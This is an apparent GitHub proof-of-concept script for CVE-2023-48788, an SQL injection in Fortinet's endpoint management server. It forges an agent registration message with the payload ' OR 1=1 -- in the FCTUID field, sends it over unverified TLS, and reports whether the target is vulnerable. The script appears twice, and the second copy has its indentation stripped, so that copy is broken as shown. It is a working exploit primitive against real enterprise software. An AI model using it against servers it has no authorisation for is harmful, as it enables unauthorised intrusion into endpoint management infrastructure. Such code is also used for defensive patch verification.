vncloudsco/CVE-2023-48788.Py

## CVE-2023-48788.Py
import argparse
import socket
import ssl

REGISTER = (
    "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{}\n"
    + "IP=127.0.0.1\n"
    + "MAC=00-50-56-11-22-33\n"
    + "FCT_ONNET=0\n"
    + "CAPS=32767\n"
    + "VDOM=default\n"
    + "EC_QUARANTINED=0\n"
    + "SIZE=    {}\n"
    + "\n"
    + "X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9NTczMTUzMkItMkUyOC00OEYwLUFDQ0YtNDI4MEU0ODNFRTE0Ck5XSUZTPUV0aGVybmV0MHwxMC4wLjQwLjg1fDAwLTUwLTU2LTg0LTMzLWIyfDEwLjAuNDAuMjU0fGY0LTRlLTA1LTRmLTZjLTQ4fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTI2MTY1Njk4OTQtNDUzOTU0ODcxLTE0NTg4MDY4Mi01MDAKR1JPVVBfVEFHPQpBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=\n"
    + "X-FCCK-REGISTER-END"
    + "\r\n"
    + "\r\n"
)

SQLI = "' OR 1=1 --"

def send_message(target, port):
    sqli = SQLI
    msg_len = len(REGISTER + sqli)
    msg = REGISTER.format(sqli, msg_len)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5.0)
    addr = (target, int(port))
    context = ssl.create_default_context()
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    secure_socket = context.wrap_socket(s, server_hostname="asdf")
    secure_socket.connect(addr)
    secure_socket.send(msg.encode())
    print(f"[+] Sent Message!\n{msg}")
    response = secure_socket.recv(1024)
    print(response)
    if response and "KA_INTERVAL" in response.decode():
        print("[+] The target is vulnerable!")
    else:
        print("[-] The target is not vulnerable!")

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-t",
        "--target",
        help="The Fortinet Endpoint Managment Server target IP address",
        required=True,
    )
    parser.add_argument(
        "-p",
        "--port",
        help="The Fortinet Endpoint Managment Server target port",
        required=True,
    )
    args = parser.parse_args()

    send_message(args.target, args.port)
	import argparse
	import socket
	import ssl

	REGISTER = (
	"MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{}\n"
	+ "IP=127.0.0.1\n"
	+ "MAC=00-50-56-11-22-33\n"
	+ "FCT_ONNET=0\n"
	+ "CAPS=32767\n"
	+ "VDOM=default\n"
	+ "EC_QUARANTINED=0\n"
	+ "SIZE= {}\n"
	+ "\n"
	+ "X-FCCK-REGISTER: SYSINFO\|\|QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9NTczMTUzMkItMkUyOC00OEYwLUFDQ0YtNDI4MEU0ODNFRTE0Ck5XSUZTPUV0aGVybmV0MHwxMC4wLjQwLjg1fDAwLTUwLTU2LTg0LTMzLWIyfDEwLjAuNDAuMjU0fGY0LTRlLTA1LTRmLTZjLTQ4fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTI2MTY1Njk4OTQtNDUzOTU0ODcxLTE0NTg4MDY4Mi01MDAKR1JPVVBfVEFHPQpBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=\n"
	+ "X-FCCK-REGISTER-END"
	+ "\r\n"
	+ "\r\n"
	)

	SQLI = "' OR 1=1 --"

	def send_message(target, port):
	sqli = SQLI
	msg_len = len(REGISTER + sqli)
	msg = REGISTER.format(sqli, msg_len)
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(5.0)
	addr = (target, int(port))
	context = ssl.create_default_context()
	context.check_hostname = False
	context.verify_mode = ssl.CERT_NONE
	secure_socket = context.wrap_socket(s, server_hostname="asdf")
	secure_socket.connect(addr)
	secure_socket.send(msg.encode())
	print(f"[+] Sent Message!\n{msg}")
	response = secure_socket.recv(1024)
	print(response)
	if response and "KA_INTERVAL" in response.decode():
	print("[+] The target is vulnerable!")
	else:
	print("[-] The target is not vulnerable!")

	if __name__ == "__main__":
	parser = argparse.ArgumentParser()
	parser.add_argument(
	"-t",
	"--target",
	help="The Fortinet Endpoint Managment Server target IP address",
	required=True,
	)
	parser.add_argument(
	"-p",
	"--port",
	help="The Fortinet Endpoint Managment Server target port",
	required=True,
	)
	args = parser.parse_args()

	send_message(args.target, args.port)